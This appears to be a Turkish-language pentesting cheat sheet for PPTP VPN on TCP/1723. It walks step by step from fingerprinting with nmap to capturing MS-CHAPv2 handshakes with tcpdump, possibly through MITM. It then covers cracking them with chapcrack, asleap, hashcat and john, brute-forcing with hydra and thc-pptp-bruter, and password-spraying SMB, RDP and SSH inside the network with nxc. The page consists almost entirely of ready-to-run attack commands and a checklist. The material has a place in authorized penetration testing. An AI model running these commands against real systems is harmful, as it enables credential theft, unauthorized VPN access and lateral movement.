Skip to content

1723 - Pentesting PPTP

network vpn

PPTP (TCP/1723 + GRE) eski VPN’dir. MS-CHAPv2 zayıflığı hash yakalama ve offline kırma ile credential üretir.

  1. 1723/tcp ve GRE’nin erişilebilirliğini doğrula.

  2. PPTP handshake / MS-CHAPv2 challenge-response yakala.

  3. Hash’i chapcrack / asleap / hashcat ile kır.

  4. Elde edilen parola ile VPN veya başka serviste dene.

Terminal window
nmap -Pn -sV -p1723 TARGET
Terminal window
nmap -Pn -p1723 --script pptp-version TARGET
Terminal window
ike-scan TARGET # komşu VPN ailesi için
Terminal window
pptpsetup --create lab --server TARGET --username user --password pass --encrypt
Terminal window
pon lab
Terminal window
nmap -Pn -p1723 TARGET; ping -c1 TARGET
Terminal window
# trafik dinleme (MITM veya kendi client handshake)
tcpdump -i eth0 -w pptp.pcap host TARGET and \(port 1723 or proto gre\)
Terminal window
chapcrack.py -f pptp.pcap
Terminal window
asleap -r pptp.pcap -w wordlist.txt
Terminal window
hashcat -m 5500 mschapv2.hash rockyou.txt
Terminal window
john mschapv2.hash --wordlist=rockyou.txt
Terminal window
thc-pptp-bruter -u user -w rockyou.txt TARGET
Terminal window
hydra -l user -P rockyou.txt pptp://TARGET
- VPN IP alınca iç ağ taraması
- Aynı parola ile SMB/RDP/SSH spray
- Routing table / split-tunnel farkı
Terminal window
ip route; ip a
Terminal window
nxc smb 10.0.0.0/24 -u user -p 'CrackedPass'
[ ] 1723 açık / PPTP fingerprint
[ ] MS-CHAPv2 yakalandı
[ ] Hash kırıldı veya brute başarılı
[ ] VPN içi erişim / spray kanıtı